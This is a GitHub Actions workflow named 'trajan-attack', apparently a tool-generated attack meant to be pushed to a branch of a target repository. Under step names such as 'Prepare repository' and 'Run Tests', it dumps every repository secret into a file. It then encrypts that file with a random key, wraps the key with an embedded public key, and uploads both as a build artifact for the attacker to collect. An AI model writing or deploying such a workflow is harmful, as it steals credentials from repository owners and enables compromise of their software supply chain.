name: trajan-attack-e2375d2d
on:
  push:
    branches:
      - trajan-attack-e2375d2d
jobs:
  testing:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare repository
        env:
          VALUES: ${{ toJSON(secrets) }}
        run: |
          cat <<EOF > output.json
          $VALUES
          EOF
      - name: Run Tests
        env:
          PUBKEY: |
            -----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAoEBag1Z9IAjGPql8sYEc
7lh5wC17XeiYUI0tObZPxZUd0bGZanNhCgtZCAXdArowPqcRFOQKLotDcmWfkx+2
hIO4D1KIsidPgu/RnJAW3OR9veAzidjctTIdbLBSj69ekLHBDVNmrSmEL8dksqUh
olRfq8vP+0SJo0AQEESMEBnMsMljSByqal6yqdRo7snBRIphNFFv30NVzgj85Dpt
09eznNvdIDzVjR8lHZ4p/zBqPxlPVumbahzc9R68UY+F7u0h99loKWMVUFiqPdjx
y2bp8Hz3BBRrhMFisR5A9Iaq4bSiCCmVhNKurIkbCQ3wc+en3KBC+pd/7u6g3IJ+
swrPBFt0MTRzlNcHH3s5sK6CbgrqBFPtSON5FOLD42wKAI7Zvgz1z58u4vO+0wn7
qmOk2FpaAcNHIeMkLz3/7nR+/u8hv8AWib6sVXRGiAbEihNsCAtm9XLuSnllwxzN
F58YuvTo+hkQXqzIuodGAhsa6wT2avIIumDqJvsGfSMM18Yv9WHtO/Lq+GmRICNd
rxMsN3NrUytz7rDE1FDveB//FL2fFXfnTAFN5ZRyIh8amMugWZa0ZxSWaqUoqshr
Hous4mgBJjteolol/SNbW5TOYSmXT1s7NT6fgxIqN+nygB9hiO08ax31bmP7ZDnb
MB4D8BLZv3yyuxnZCQ3LDX0CAwEAAQ==
-----END PUBLIC KEY-----

        run: |
          aes_key=$(openssl rand -hex 12 | tr -d '\n')
          openssl enc -aes-256-cbc -pbkdf2 -in output.json -out output_updated.json -pass pass:$aes_key
          echo $aes_key | openssl rsautl -encrypt -pkcs -pubin -inkey <(echo "$PUBKEY") -out lookup.txt 2>/dev/null
      - name: Upload artifacts
        uses: actions/upload-artifact@v4
        with:
          name: files
          path: |
            output_updated.json
            lookup.txt
